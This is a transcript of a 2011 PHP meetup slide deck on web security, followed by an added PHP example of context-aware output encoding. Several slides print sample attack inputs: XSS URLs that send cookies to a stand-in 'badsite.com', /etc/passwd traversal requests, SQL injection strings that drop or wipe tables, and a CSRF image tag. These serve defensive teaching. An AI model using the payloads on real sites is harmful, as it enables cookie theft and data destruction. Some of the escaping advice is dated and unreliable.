SydPHP Security in PHP

Security in PHP talk for SydPHP, Thursday 24th February, 2011

Published in Technology
Transcript

  • 1. Security and PHP
    February 2011
  • 2. Allan Shone
    Technical Yahoo!, Local Paranoid @Yahoo!7
    Been at Yahoo!7 just under 3 years
    allan.shone@yahoo.com
  • 3. Website Security
  • 4. What is Security?
    Why is Security important?
    What can you do about it?
  • 5. Types of issues
    XSS
    SQL Injection
    Session Hijacking
    CSRF
    Phishing
  • 6. Why XSS?
  • 7. Lead to larger problems
    Used to inject code into your site
    Bad people ™ can steal user information
  • 8. http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E
    http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E
    http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E
  • 9. February 2011
  • 10. http://sydphp.leetbix.com/template.php?load=/etc/passwd%00
    http://sydphp.leetbix.com/template.php?load=../some-config.conf%00
  • 11. POST too
  • 12. What do I do?!
  • 13. Filter
    Simplest solution: htmlentities()
  • 14. SQL what?
  • 15. Arbitrary SQL code being executed
    Bypass login, edit database content
    Find passwords, hidden information
  • 16. http://sydphp.leetbix.com/login.php
    Password: ' OR 1=1 -- '
    ' OR 1=1; DROP TABLE users; -- '
    ' OR 1=1; UPDATE TABLE users SET password='' WHERE 1=1; -- '
  • 17. Oh no!
  • 18. http://xkcd.com/327/
  • 19. escape
  • 20. mysql_real_escape_string()
    addslashes()
    PDO
    PDO::quote()
  • 21. Session hijacking
  • 22. Bad for users
    Bad for data integrity
    Easy to prevent
  • 23. Not stand-alone
  • 24. Cookies
  • 25. Integrity checking
  • 26. CSRF? Sugar?
  • 27. Cross-site request forgery
  • 28. Simple, but uncommon
  • 29. <img src="http://othersite.com/changepasswd?new=onlyIKnow" />
    <script>
    a=document.createElement('img');a.src='http://badsite../';document.firstChild.appendChild(a);
    a.src='http://badsite.com/otherpage';
    </script>
  • 30. Integrity, integrity
  • 31. Phishing!
  • 32. Same, but different?
  • 33. But what can you do
  • 34. PHP’s filter functions
  • 35. filter_has_var
    filter_id
    filter_input_array
    filter_input
    filter_list
    filter_var_array
    filter_var
  • 36. No more SuperGlobals
  • 37. $search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
    echo "<h3>No results found for '{$search}'.</h3>";
    echo "<a href='?search=$search&page=2'>Next page</a>";
  • 38. INPUT_GET
    INPUT_POST
    INPUT_COOKIE
    INPUT_SERVER
    INPUT_ENV
  • 39. Twitter
    Allan Shone - @cerealboy
    Jared Mooring - @jadzor
    Filter function filters: http://au2.php.net/manual/en/filter.filters.php
    February 2011
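As an added example (not from the slides), the snippet on slide 37 reworked so that the search term is encoded for each output context separately: HTML-escaped where it lands in the heading, percent-encoded and then HTML-escaped where it lands in the link's query string, while the page number is validated with FILTER_VALIDATE_INT rather than sanitized. The `$get` array stands in for `$_GET` so the script runs from the CLI, and the input is constructed.

```php
<?php
// Added example, not code from the talk. Assumes PHP >= 5.4 (ENT_HTML5).
// $get stands in for $_GET so this runs from the command line.

// Validate, don't just sanitize: 'page' must be an integer >= 1, else 1.
function current_page(array $get)
{
    return filter_var(
        isset($get['page']) ? $get['page'] : 1,
        FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 1, 'default' => 1))
    );
}

// Encode for an HTML text node or a double-quoted attribute value.
function h($s)
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Build the "no results" heading and the next-page link from slide 37,
// keeping the raw value in $search and encoding only at the point of output.
function render_search(array $get)
{
    $search = filter_var(
        isset($get['search']) ? $get['search'] : '',
        FILTER_UNSAFE_RAW  // returns the string unchanged
    );
    $next = current_page($get) + 1;

    // Context 1: HTML body text.
    $heading = "<h3>No results found for '" . h($search) . "'.</h3>";

    // Context 2: a URL query string inside an HTML attribute. Percent-encode
    // for the URL first, then HTML-encode the whole attribute value (this is
    // what turns the '&' between parameters into '&amp;').
    $href = '?search=' . rawurlencode($search) . '&page=' . $next;
    $link = '<a href="' . h($href) . '">Next page</a>';

    return $heading . "\n" . $link . "\n";
}

// Constructed input that would break out of the original slide's markup
// and smuggle a second 'page' parameter into the link.
$input = array('search' => "<script>alert(0)</script>&page=99'", 'page' => '2');
echo render_search($input);
```

Run it with `php example.php`: the heading shows the search term as literal text, and the link's query string carries it as one percent-encoded value with `page=3`.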